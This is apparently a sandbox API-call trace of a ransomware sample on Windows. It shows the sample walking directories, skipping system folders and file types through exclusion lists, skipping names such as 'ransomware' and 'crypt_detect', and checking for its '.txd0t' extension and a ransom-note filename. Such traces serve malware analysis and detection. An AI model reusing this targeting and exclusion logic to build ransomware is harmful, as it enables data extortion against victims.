[0072.025] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0072.025] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0072.025] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0072.025] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0072.025] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0072.025] StrCmpW (psz1="Windows PowerShell.evtx", psz2=".") returned 1 [0072.025] StrCmpW (psz1="Windows PowerShell.evtx", psz2="..") returned 1 [0072.025] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0072.025] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0072.025] StrNCatW (in: psz1="C:\\Logs\\", psz2="Windows PowerShell.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Windows PowerShell.evtx") returned="C:\\Logs\\Windows PowerShell.evtx" [0072.025] PathFindExtensionW (pszPath="Windows PowerShell.evtx") returned=".evtx" [0072.025] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="bootsect.bak") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="iconcache.db") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="thumbs.db") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2=" ransomware ") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2=" ransom ") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="debug.txt") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="boot.ini") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="desktop.ini") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="autorun.inf") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="ntuser.dat") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="ntldr") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="ntdetect.com") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="bootfont.bin") returned 1 [0072.025] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.025] PathFindExtensionW (pszPath="Windows PowerShell.evtx") returned=".evtx" [0072.025] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0072.025] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0072.025] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0072.026] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0072.026] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0072.026] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0072.026] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0072.026] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 0 [0072.026] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0072.027] GetProcessHeap () returned 0xe30000 [0072.027] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0072.027] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xaced8ceb, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0072.027] StrCmpW (psz1="pagefile.sys", psz2=".") returned 1 [0072.027] StrCmpW (psz1="pagefile.sys", psz2="..") returned 1 [0072.027] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0072.027] StrCmpW (psz1="PerfLogs", psz2=".") returned 1 [0072.027] StrCmpW (psz1="PerfLogs", psz2="..") returned 1 [0072.027] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0072.027] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0072.027] StrNCatW (in: psz1="C:\\", psz2="PerfLogs", cchMax=1030 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system32\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\local\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\boot\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\perflogs\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\programdata\\") returned 0x0 [0072.027] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\drivers\\") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\wsus\\") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="crypt_detect") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="cryptolocker") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="ransomware") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\WINDOWS") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.028] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files") returned 0x0 [0072.028] GetProcessHeap () returned 0xe30000 [0072.028] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x498) returned 0xecab68 [0072.028] StrCpyNW (in: psz1=0xecab68, psz2="C:\\PerfLogs", cchMax=1048 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0072.028] StrNCatW (in: psz1="C:\\PerfLogs", psz2="\\*", cchMax=1048 | out: psz1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0072.028] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0072.029] StrCmpW (psz1=".", psz2=".") returned 0 [0072.029] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.029] StrCmpW (psz1="..", psz2=".") returned 1 [0072.029] StrCmpW (psz1="..", psz2="..") returned 0 [0072.029] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0072.029] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0072.029] GetProcessHeap () returned 0xe30000 [0072.029] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0072.029] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf0ddeecc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xf0ddeecc, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0072.029] StrCmpW (psz1="Program Files", psz2=".") returned 1 [0072.029] StrCmpW (psz1="Program Files", psz2="..") returned 1 [0072.029] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0072.029] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0072.029] StrNCatW (in: psz1="C:\\", psz2="Program Files", cchMax=1030 | out: psz1="C:\\Program Files") returned="C:\\Program Files" [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system32\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\local\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\boot\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\perflogs\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\programdata\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\drivers\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\wsus\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="crypt_detect") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="cryptolocker") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="ransomware") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\WINDOWS") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.030] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files") returned="C:\\Program Files" [0072.030] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0072.030] StrCmpW (psz1="Program Files (x86)", psz2=".") returned 1 [0072.030] StrCmpW (psz1="Program Files (x86)", psz2="..") returned 1 [0072.030] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0072.030] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0072.030] StrNCatW (in: psz1="C:\\", psz2="Program Files (x86)", cchMax=1030 | out: psz1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system32\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\local\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\boot\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\perflogs\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\programdata\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\drivers\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\wsus\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="crypt_detect") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="cryptolocker") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="ransomware") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\WINDOWS") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0072.031] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0072.031] StrCmpW (psz1="ProgramData", psz2=".") returned 1 [0072.031] StrCmpW (psz1="ProgramData", psz2="..") returned 1 [0072.031] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0072.031] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0072.031] StrNCatW (in: psz1="C:\\", psz2="ProgramData", cchMax=1030 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.031] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system32\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.031] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\local\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\boot\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\perflogs\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\programdata\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\drivers\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\wsus\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\efstmpwp\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="crypt_detect") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="cryptolocker") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="ransomware") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\WINDOWS") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0072.032] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files") returned 0x0 [0072.032] GetProcessHeap () returned 0xe30000 [0072.032] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xecab68 [0072.032] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.032] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\*", cchMax=1054 | out: psz1="C:\\ProgramData\\*") returned="C:\\ProgramData\\*" [0072.032] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec26b0 [0072.032] StrCmpW (psz1=".", psz2=".") returned 0 [0072.032] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.032] StrCmpW (psz1="..", psz2=".") returned 1 [0072.032] StrCmpW (psz1="..", psz2="..") returned 0 [0072.032] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0072.032] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0072.032] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0072.032] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.033] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.033] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Adobe", cchMax=1054 | out: psz1="C:\\ProgramData\\Adobe") returned="C:\\ProgramData\\Adobe" [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\locallow\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\all users\\microsoft\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\inetpub\\logs\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\boot\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\perflogs\\") returned 0x0 [0072.033] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Adobe" [0072.033] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0072.033] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0072.033] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0072.033] FindNextFileW (in: hFindFile=0xec26b0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0072.033] StrCmpW (psz1="Comms", psz2=".") returned 1 [0072.033] StrCmpW (psz1="Comms", psz2="..") returned 1 [0072.033] StrCpyNW (in: psz1=0xecab68, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0072.033] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0072.033] StrNCatW (in: 